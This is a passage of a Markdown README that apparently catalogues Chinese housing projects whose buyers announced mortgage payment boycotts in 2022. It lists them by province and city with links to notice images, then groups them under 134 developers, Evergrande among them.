[ๆ’ๅคงๆž—ๆบช้ƒก๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/hdlxj.jpg), [ๆ’ๅคง็‰งไบ‘ๅคฉๅณฐ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ๆˆ้ƒฝๆ–ฐๆดฅๆ’ๅคง็‰งไบ‘ๅคฉๅณฐ.jpg), [ๆ’ๅคงๆœชๆฅๅŸŽ4ๆœŸ๏ผˆ7ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ๆˆ้ƒฝๅธ‚ๆธฉๆฑŸๅŒบๆ’ๅคงๆœชๆฅๅŸŽ4ๆœŸ.jpg), [ไธ‰็››็ฟกไฟชๅฑฑ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ssfls.jpg), [ไธ‡้”ฆ็†™ๅฒธ2ๆœŸ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/wjxa2.png), [ๆญฆไพฏๆ–ฐๅŸŽๅฝ“ไปฃ็’ž่ช‰๏ผˆ7ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/whxcdd.jpg), [ๆ–ฐๅฐšๅฐš้™ข๏ผˆ10ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ๆˆ้ƒฝๆธฉๆฑŸๅŒบๆ–ฐๅฐšๅฐš้™ขๅ‘Š็Ÿฅไนฆ.png), [้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ๆˆ้ƒฝ้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ.jpeg), ็ฝฎไฟก้€ธ้ƒฝๅŸŽ๏ผˆ9ๆœˆ๏ผ‰ - **ๅพท้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ](images/ๅ››ๅท็œ/ๅพท้˜ณๅธ‚/ๅ››ๅทๅพท้˜ณๆ’ๅคง็ฟก็ฟ ๅŽๅบญ.jpg) - **้ƒฝๆฑŸๅ ฐๅธ‚๏ผˆ1๏ผ‰๏ผš** [่žๅˆ›ๆ–‡ๆ—…ๆปจๆฑŸๆ–ฐๅŒบ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/้ƒฝๆฑŸๅ ฐๅธ‚/้ƒฝๆฑŸๅ ฐๅธ‚่žๅˆ›ๆ–‡ๆ—…ๆปจๆฑŸๆ–ฐๅŒบๅ…จไฝ“ไธšไธปๅ†ณๅฎš2022ๅนด8ๆœˆ30ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg) - **ๅนฟๅฎ‰ๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅธ่ฐทๅ…ฌๅ›ญๅŸŽไธ‰ๆœŸ - **ๆณธๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๆนพ - **็œ‰ๅฑฑๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ๏ผˆ10ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/็œ‰ๅฑฑๅธ‚/็œ‰ๅฑฑๅธ‚ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ3-14ๅœฐๅ—ๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ.png), [็œ‰ๅฑฑๅธ‚ๅฝญๅฑฑๅŒบ่žๅˆ›ๆฐด้ƒกๆœชๆฅๅŸŽ๏ผˆๆฑŸๅฃๆฐด้•‡๏ผ‰๏ผˆ10ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/็œ‰ๅฑฑๅธ‚/็œ‰ๅฑฑๅธ‚ๅฝญๅฑฑๅŒบ่žๅˆ›ๆฐด้ƒกๆœชๆฅๅŸŽใ€ๆฑŸๅฃๆฐด้•‡ๅ…จไฝ“ไธšไธปๅ†ณๅฎšๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๅ—ๅ……ๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๅ—ๅ……ๅคงๅˆๅŽๅบœ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๅ—ๅ……ๅธ‚/ๅ—ๅ……ๅคงๅˆๅŽๅบœ.png), [ๅ—ๅ……้€ธๅˆไธญๅคฎๅ…ฌๅ›ญ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๅ—ๅ……ๅธ‚/ๅ—ๅ……้€ธๅˆไธญๅคฎๅ…ฌๅ›ญ.png) ### ๅคฉๆดฅๅธ‚ [ 9 ] - **ๅฎๅปๅŒบ๏ผˆ1๏ผ‰๏ผš** [ๅฎๅปๅŒบๅฎžๅœฐๆตทๆฃ ้›…่‘—ๅœฃๆ™ฏ่ฑชๅบญ](images/ๅคฉๆดฅๅธ‚/ๅฎๅปๅŒบ/ๅคฉๆดฅๅธ‚ๅฎžๅœฐๆตทๆฃ ้›…่‘—ๅœฃๆ™ฏ่ฑชๅบญ.jpeg) - **ๅŒ—่พฐๅŒบ๏ผˆ2๏ผ‰๏ผš** [่žๅˆ›ๆดฅๅฎธๅฃนๅท](images/ๅคฉๆดฅๅธ‚/ๅŒ—่พฐๅŒบ/ๅคฉๆดฅๅธ‚ๆดฅๅฎธๅฃนๅทๅ…จไฝ“ไธšไธปโ€œๅŠจๆ€่ฟ˜่ดทโ€ๅ‘Š็Ÿฅไนฆ.png), [่žๅˆ›ๅพกๆ™ฏๅฎธ้™ข](images/ๅคฉๆดฅๅธ‚/ๅŒ—่พฐๅŒบ/ๅคฉๆดฅๅธ‚ๅŒ—่พฐๅŒบ่žๅˆ›ๅพกๆ™ฏๅฎธ้™ขๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๆดฅๅ—ๅŒบ๏ผˆ1๏ผ‰๏ผš** ๅ››ๅญฃๆ˜ฅๆ™“ - **ๅคฉๆดฅๅŸŽๅŒบ๏ผˆ4๏ผ‰๏ผš** [่žๅˆ›ๅ—ๅผ€ๅฎธ้™ขไบŒๆœŸ](images/ๅคฉๆดฅๅธ‚/ๅคฉๆดฅๅŸŽๅŒบ/ๅคฉๆดฅ่žๅˆ›ๅ—ๅผ€ๅฎธ้™ขไบŒๆœŸไฝๅฎ…ๅ…จไฝ“ไธšไธปๅŠจๆ€่ฟ˜่ดทๅ‘Š็Ÿฅไนฆ.jpg), ๅฎžๅœฐๆตทๆฃ ้›…่‘—ๅœฃๆ™ฏ่ฑชๅบญ๏ผˆ8ๆœˆ๏ผ‰, ๅฎžๅœฐ่”ท่–‡๏ผˆ9ๆœˆ๏ผ‰, [ๅคฉๆดฅๅคฉๆˆฟๆจพๆข…ๆฑŸไฝๅฎ…](images/ๅคฉๆดฅๅธ‚/ๅคฉๆดฅๅŸŽๅŒบ/_ๅคฉๆดฅๅคฉๆˆฟๆจพๆข…ๆฑŸไฝๅฎ…) - **ๆญฆๆธ…ๅŒบ๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๆนพ๏ผˆ10ๆœˆ๏ผ‰ ### ไบ‘ๅ—็œ [ 8 ] - **ๅคง็†็™ฝๆ—่‡ชๆฒปๅทž๏ผˆ1๏ผ‰๏ผš** [ๅคง็†็š„ๅฐ้™ขๅญๅŒ—ๅŒบ๏ผˆ12ๆœˆ๏ผ‰](images/ไบ‘ๅ—็œ/ๅคง็†็™ฝๆ—่‡ชๆฒปๅทž/_ๅคง็†็š„ๅฐ้™ขๅญๅŒ—ๅŒบ) - **ๆ˜†ๆ˜Žๅธ‚๏ผˆ6๏ผ‰๏ผš** ๆ’ๅคงๅŸŽ๏ผˆ9ๆœˆ๏ผ‰, ๆ’ๅคง็Ž–็‘ๆนพ๏ผˆ9ๆœˆ๏ผ‰, ๆ’ๅคง้˜ณๅ…‰ๅŠๅฒ›๏ผˆ9ๆœˆ๏ผ‰, ไฝณๅ…†ไธšๅŸŽๅธ‚ๅนฟๅœบ๏ผˆ9ๆœˆ๏ผ‰, ่“ๅ…‰ๅพทๅ•†ๅคฉๅŸŸ๏ผˆ8ๆœˆ๏ผ‰, ๅฎžๅœฐ่Šฑ้นค็ฟŽ๏ผˆ10ๆœˆ๏ผ‰ - **็Ž‰ๆบชๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆจฑ่Šฑ่ฐท๏ผˆ7ๆœˆ๏ผ‰ ### ๆต™ๆฑŸ็œ [ 6 ] - **ๆญๅทžๅธ‚๏ผˆ4๏ผ‰๏ผš** [ๅฏŒ้˜ณๅŒบๆณฐ็ฆพๅคงๅŸŽๅฐ้™ขๆฅผ็›˜](images/ๆต™ๆฑŸ็œ/ๆญๅทžๅธ‚/ๆต™ๆฑŸ็œๆญๅทžๅธ‚ๅฏŒ้˜ณๅŒบๆณฐ็ฆพๅคงๅŸŽๅฐ้™ขๆฅผ็›˜ๅฏŒๆ”ฟๅ‚จๅ‡บ๏ผˆ2010๏ผ‰20ๅทๅœฐๅ—่ดญๆˆฟ่€…ๆš‚ๅœ่ฟ˜่ดงๅ‘Š็Ÿฅไนฆ.jpg), [ๆญๅทžไธญๅ—ๆ˜ฅๆบช้›†](images/ๆต™ๆฑŸ็œ/ๆญๅทžๅธ‚/ๆต™ๆฑŸๆญๅทžไธญๅ—ๆ˜ฅๆบช้›†.png), [ๆ›ฒๆฑŸๆ–ฐ้ธฅ้น็ฌฌไธ‰ๅŸŽ๏ผˆๅพ…ๅœ่ดท๏ผ‰](images/ๆต™ๆฑŸ็œ/ๆญๅทžๅธ‚/ๆญๅทžๅธ‚ๆ›ฒๆฑŸๆ–ฐ้ธฅ้น็ฌฌไธ‰ๅŸŽๅœ่ดท้ฃŽ้™ฉๅ‘Š็Ÿฅไนฆ.jpg), [ไธญๆถฆ็’ž็Ž‰ๅ…ฌ้ฆ†](images/ๆต™ๆฑŸ็œ/ๆญๅทžๅธ‚/ไธญๆถฆ็’ž็Ž‰ๅ…ฌ้ฆ†.png) - **ๅ˜‰ๅ…ดๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆกไนก้‡‘็ง‘ๆ—ถไปฃๅคฉๆ‚ฆๅฐๅŒบ](images/ๆต™ๆฑŸ็œ/ๅ˜‰ๅ…ดๅธ‚/_้‡‘็ง‘ๆ—ถไปฃๅคฉๆ‚ฆๅฐๅŒบ) - **็ปๅ…ดๅธ‚๏ผˆ1๏ผ‰๏ผš** 
[็ปๅ…ด่—็‘ๅบœ](images/ๆต™ๆฑŸ็œ/็ปๅ…ดๅธ‚/_็ปๅ…ด่—็‘ๅบœ) ## ๅผ€ๅ‘ๅ•†ๆ€ป่ฎก 134๏ผˆๆŒ‰ๆ‹ผ้ŸณๆŽ’ๅบ๏ผ‰๏ผˆ็ปŸ่ฎกๆฅผ็›˜ๆ•ฐ 349๏ผ‰[ๆ•ฐๆฎๆบ](data/source/extra-info.json) <details> <summary><b> ๅฎ‰ๅพฝๆ–ฏ็‘žๆŠ•่ต„้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅฎ‰ๅพฝ็œ-ๅˆ่‚ฅๅธ‚-ๆ–ฏ็‘žๅคงๅŽฆ </details> <details> <summary><b> ๅฎ‰่”ๅœฐไบง้›†ๅ›ข ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ๅฎ‰่”็”Ÿๆ€ๅŸŽๅ‡ฏๆ—‹ๅบœ </details> <details> <summary><b> ๅฅฅๅฑฑ้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅฅฅๅฑฑๆฑ‰ๅฃๆพŽๆนƒๅŸŽ,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅฅฅๅฑฑ็ปๅผ€ๆพŽๆนƒๅŸŽ๏ผˆ7ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅฅฅๅฑฑ้ฆ–ๅบœ </details> <details> <summary><b> ๅฅฅๅ›ญ้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅฅฅๅ›ญ่ช‰ๆน–ๆนพ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅฅฅๅ›ญๆ‚ฆๅŸŽ๏ผˆๆฑ‡ๆ™ฏๅ›ญ๏ผ‰ </details> <details> <summary><b> ็™พไธ–้‡‘่ฐทๅฎžไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-็›ˆๆ—ถยทๆœชๆฅๆธฏ </details> <details> <summary><b> ๅฎ่ƒฝ ใ€2ใ€‘</b></summary> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๅฎ่ƒฝๅŸŽไธ€ๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆต™ๆฑŸ็œ-็ปๅ…ดๅธ‚-็ปๅ…ด่—็‘ๅบœ </details> <details> <summary><b> ไฟๅฎš้“ญๅŸŸๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-ไฟๅฎšๅธ‚-ไธŠไธœๅพกๆ™ฏ </details> <details> <summary><b> ๅŒ—ๅคง่ต„ๆบ้›†ๅ›ขๆŽง่‚กๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๆฒณๅ—็œ-ๅผ€ๅฐๅธ‚-ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบๆœชๅๅบœไธ€ๆœŸ,<br> ๆฒณๅ—็œ-ๅผ€ๅฐๅธ‚-ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบ็ดซๅขƒๅบœไบŒๆœŸ,<br> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-ๅŒ—ๅคง่ต„ๆบ็ฟก็ฟ ๅ…ฌๅ›ญ </details> <details> <summary><b> ๅŒ—ไบฌๆ˜Š่ฟœ้š†ๅŸบๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅŒ—ไบฌๅธ‚-ๆˆฟๅฑฑๅŒบ-้•ฟๆตทๅพกๅข…ไธ‰ๆœŸ </details> <details> <summary><b> ๅŒ—ไบฌ้ธฟๅคไผŸไธšๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-้ธฟๅคๅ‡คๅ‡ฐๅŸŽไบ”ๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-้ธฟๅค็†ๆƒณๅŸŽ </details> <details> <summary><b> ๅธธ็†Ÿๅธ‚ๆ–ฐๆบๆˆฟๅœฐไบงๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ไธŠๆตทๅธ‚-ๅ˜‰ๅฎšๅŒบ-ๅ˜‰ๅฎšๅ—็ฟ”็ปฟ่ŒตๅŸŽๅธ‚ๅนฟๅœบ </details> <details> <summary><b> ้ƒดๅทžๅธ‚้ฒฒ้นๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-้ƒดๅทžๅธ‚-้ƒดๅทž้ฒฒ้นๅ•†่ดธๅŸŽ </details> <details> <summary><b> ้‡ๅบ†ๅพทๆฐๅœฐไบง้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๅพทๆฐ็Šถๅ…ƒๅบœ้‚ธ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ้‡ๅบ†ๅธ‚ๅคฉไป™ๆน–็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ไธ‡ๅทžๅŒบ-ๅคฉไป™ๆน–้ป„้‡‘ๆตทๅฒธ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ่พพๅŽฟๅŒ็››ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๅทดไธญๅธ‚-ๆฉ้˜ณๅทๆ—…ไธ–็บชๅค–ๆปฉ </details> <details> <summary><b> ๅคงๅˆ็ฝฎไธš ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๅ—ๅ……ๅธ‚-ๅ—ๅ……ๅคงๅˆๅŽๅบœ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅคง่ฟž็ปฟๆบๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ่พฝๅฎ็œ-ๅคง่ฟžๅธ‚-้ฆ™ๆตทๆปจๅŸŽไบŒๆœŸ </details> <details> <summary><b> ๅฝ“ไปฃ็ฝฎไธš๏ผˆไธญๅ›ฝ๏ผ‰ๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๅฝ“ไปฃๅ˜‰ๅฎๅ…ฌๅ›ญๆ‚ฆ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰ๅฝ“ไปฃๅขƒMOMA </details> <details> <summary><b> ้“ๅŽฟๅŽ็›ˆ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆฐธๅทžๅธ‚-้“ๅŽฟไธœๆ–นไธฝ้ƒฝไธ‰ๆœŸ๏ผˆๆฐธๅทž้“ๅŽฟ๏ผ‰ </details> <details> <summary><b> ๅพท้พ™ๆˆฟๅœฐไบง ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-ๆ‰ฟๅพทๅธ‚-็Šถๅ…ƒๅบœ </details> <details> <summary><b> ๅฏŒๅŠ› ใ€3ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-้ป”ๆฑŸๅŒบ-ๅฏŒๅŠ›้™ขๅฃซๅปถ็…ๅขƒ,<br> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๅฏŒๅŠ›ๅ›ญๅบทๅ•†ไธšๅนฟๅœบ,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๅคชๅŽŸๅฏŒๅŠ›ๅคฉ็ฆงๅŸŽ3ๆœŸ </details> <details> <summary><b> ๅนฟ่ฅฟๆฑŸๅฎ‡ๆˆฟๅœฐไบงๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> 
广西壮族自治区-南宁市-江宇世纪公馆
</details>
<details>
<summary><b> 广西鹿寨祥瑞晟邦投资有限公司 【1】</b></summary>
广西壮族自治区-柳州市-鹿寨县麓湖公园里
</details>
<details>
<summary><b> 广西三环企业集团股份有限公司 【1】</b></summary>
广西壮族自治区-玉林市-北流市三环新城二期
</details>
<details>
<summary><b> 桂林市合凯实业有限公司 【2】</b></summary>
广西壮族自治区-桂林市-山水国际,<br>
广西壮族自治区-桂林市-山水华庭
</details>
<details>
<summary><b> 桂林市灵川县万象商贸城有限公司 【1】</b></summary>
广西壮族自治区-桂林市-灵川汇金万象新城（11月）
</details>
<details>
<summary><b> 浩创置业集团有限公司 【2】</b></summary>
河南省-郑州市-浩创梧桐茗筑（7月）,<br>
河南省-郑州市-新郑市浩创城
</details>
<details>
<summary><b> 合能地产 【3】</b></summary>
湖南省-长沙市-合能枫丹宸悦,<br>
湖南省-长沙市-合能湘江公馆,<br>
陕西省-西安市-西安远洋合能枫丹唐悦二期（待停贷）
</details>
<details>
<summary><b> 河北永康房地产开发集团有限公司 【1】</b></summary>
河北省-邢台市-永康万国城
</details>
<details>
<summary><b> 河南安昇房地产有限公司 【1】</b></summary>
河南省-郑州市-正商玖号院
</details>
<details>
<summary><b> 河南华纳置业股份有限公司 【1】</b></summary>
河南省-郑州市-华纳龙熙湾
</details>
<details>
<summary><b> 河南乐裕置业有限公司 【1】</b></summary>
河南省-郑州市-乐裕龙城
</details>
<details>
<summary><b> 河南美商置业有限公司 【1】</b></summary>
河南省-郑州市-龙湖一号（9月）
</details>
<details>
<summary><b> 河南省翰高置业有限公司 【1】</b></summary>
河南省-周口市-槐府六号三期
</details>
<details>
<summary><b> 河南省林鑫实业有限公司 【1】</b></summary>
河南省-郑州市-蓝宝桃源里
</details>
<details>
<summary><b> 河南省清华房地产开发有限公司 【1】</b></summary>
河南省-郑州市-清华城（7月）
</details>
<details>
<summary><b> 河南省泰山岩土实业有限责任公司 【1】</b></summary>
河南省-郑州市-泰山誉景朗誉园
</details>
<details>
<summary><b> 河南盛润置业集团有限公司 【1】</b></summary>
河南省-郑州市-盛润城壹号公馆
</details>
<details>
<summary><b> 河南新田城置业有限公司 【1】</b></summary>
河南省-郑州市-郑州新田城湖光里二期(原洞林文苑)
</details>
<details>
<summary><b> 河南兴达投资有限公司 【1】</b></summary>
河南省-南阳市-兴达珑府
</details>
<details>
<summary><b> 河南易鑫置业有限公司 【1】</b></summary>
河南省-驻马店市-佳和新城
</details>
<details>
<summary><b> 河南豫发集团有限公司 【1】</b></summary>
河南省-郑州市-豫发白鹭源春晓三期
</details>
<details>
<summary><b> 河南纵鑫置业有限公司 【1】</b></summary>
河南省-郑州市-盛世卧龙城三期（10月）
</details>
<details>
<summary><b> 恒大 【87】</b></summary>
安徽省-合肥市-恒大中心（8月）,<br>
重庆市-巴南区-恒大新城四期,<br>
重庆市-大渡口区-恒大麓山湖（9月）,<br>
重庆市-黔江区-恒大名都（7月）,<br>
重庆市-渝北区-恒大轨道时代二期,<br>
福建省-福州市-恒大天璟二期,<br>
广东省-揭阳市-恒大翡翠华庭二期,<br>
ๅนฟไธœ็œ-ๆฑ•ๅคดๅธ‚-ๆ’ๅคง้‡‘็ขงๅค–ๆปฉๆนพ๏ผˆๅ…ซๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅด‡ๅทฆๅธ‚-ๅนฟ่ฅฟๆ‰ถ็ปฅๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅบทๅ…ปๅŸŽ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆก‚ๆž—ๅธ‚-ๆก‚ๆž—ๆ’ๅคงๅŸŽ๏ผˆ10ๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆŸณๅทžๅธ‚-ๆ’ๅคงๅŸŽไบŒๆœŸใ€ไธ‰ๆœŸ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ๅ—ๅฎๆ’ๅคงๅŽๅบœไบŒๆœŸ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-้’ฆๅทžๅธ‚-ๆ’ๅคงๅพกๆ™ฏๅŠๅฒ›ไบŒๆœŸ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆขงๅทžๅธ‚-ๆ’ๅคง็ปฟๆดฒไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅŒ—็œ-้‚ฏ้ƒธๅธ‚-ๆ’ๅคง็ปฟๆดฒ,<br> ๆฒณๅŒ—็œ-้‚ฏ้ƒธๅธ‚-ๆ’ๅคงๆ‚ฆ็‘ๆนพ,<br> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ๆ’ๅคงๆ‚ฆ้พ™ๅฐ,<br> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ๆ’ๆถฆไธญๅคฎๅนฟๅœบ,<br> ๆฒณๅŒ—็œ-้‚ขๅฐๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆฒณๅŒ—็œ-ๅผ ๅฎถๅฃๅธ‚-ๅฎฃๅŒ–ๆ’ๅคงๆปจๆฒณๅทฆๅฒธ,<br> ๆฒณๅŒ—็œ-ๅผ ๅฎถๅฃๅธ‚-ๅฎฃๅŒ–ๆ’ๅคง็ฟก็ฟ ๆนพ,<br> ๆฒณๅ—็œ-ๅฎ‰้˜ณๅธ‚-ๆฒณๅ—ๅฎ‰้˜ณๆ’ๅคงๆœชๆฅๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-ๅฎ‰้˜ณๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆฒณๅ—็œ-ๅผ€ๅฐๅธ‚-้ƒ‘ๅผ€ๆ’ๅคงๆœชๆฅๅŸŽไธ‰ๆœŸ,<br> ๆฒณๅ—็œ-ๆด›้˜ณๅธ‚-ๆ’ๅคงไบ‘ๆน–ไธŠ้ƒก,<br> ๆฒณๅ—็œ-ๆผฏๆฒณๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆฒณๅ—็œ-ๅ—้˜ณๅธ‚-ๆ’ๅคงๅพกๅบœ,<br> ๆฒณๅ—็œ-ๅ•†ไธ˜ๅธ‚-ๆ’ๅคงๅ้ƒฝไบŒๆœŸ,<br> ๆฒณๅ—็œ-ๆ–ฐไนกๅธ‚-ๅนณๅŽŸๆ–ฐๅŒบๆ’ๅคงไธ‰ๆœŸๅŠๅŸŽๆน–๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆ’ๅคงๅŸŽ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆ’ๅคงๅ…ป็”Ÿ่ฐท,<br> ๆฒณๅ—็œ-้ฉป้ฉฌๅบ—ๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆน–ๅŒ—็œ-้„‚ๅทžๅธ‚-ๆ’ๅคง็ซฅไธ–็•Œๅ››ๅทๅœฐ๏ผˆๅปŠๆกฅๆฐดไนก๏ผ‰๏ผˆ9ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-้„‚ๅทžๅธ‚-ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ,<br> ๆน–ๅŒ—็œ-้šๅทžๅธ‚-ๆ’ๅคงๆ‚ฆ้พ™ๅฐ๏ผˆ10ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆ’ๅคง็ง‘ๆŠ€ๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆ’ๅคง้พ™ๅŸŽๅ››ๆœŸ,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-ๅ’ธๅฎๅธ‚-ๆ’ๅคงๅ้ƒฝ,<br> ๆน–ๅŒ—็œ-่ฅ„้˜ณๅธ‚-ๆ’ๅคง็ฟก็ฟ ้พ™ๅบญไธ€ๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-ๆ€€ๅŒ–ๅธ‚-ๆ’ๅคงๅธๆ™ฏ,<br> ๆน–ๅ—็œ-ๆ€€ๅŒ–ๅธ‚-ๆ’ๅคงไธญๅคฎๅนฟๅœบ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-ๆต้˜ณๅธ‚-ๆ’ๅคงๅŽๅบœๅ››ๆœŸ,<br> ๆน–ๅ—็œ-้‚ต้˜ณๅธ‚-ๆ’ๅคงๅŽๅบœ๏ผˆ9ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-ๆน˜ๆฝญๅธ‚-ๆ’ๅคงไนฆ้ฆ™้—จ็ฌฌ15ใ€16ๆ ‹,<br> ๆน–ๅ—็œ-ๅฒณ้˜ณๅธ‚-ๆ’ๅคงๆœชๆฅๅŸŽไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ’ๅคงๆปจๆฑŸๅทฆๅฒธ,<br> 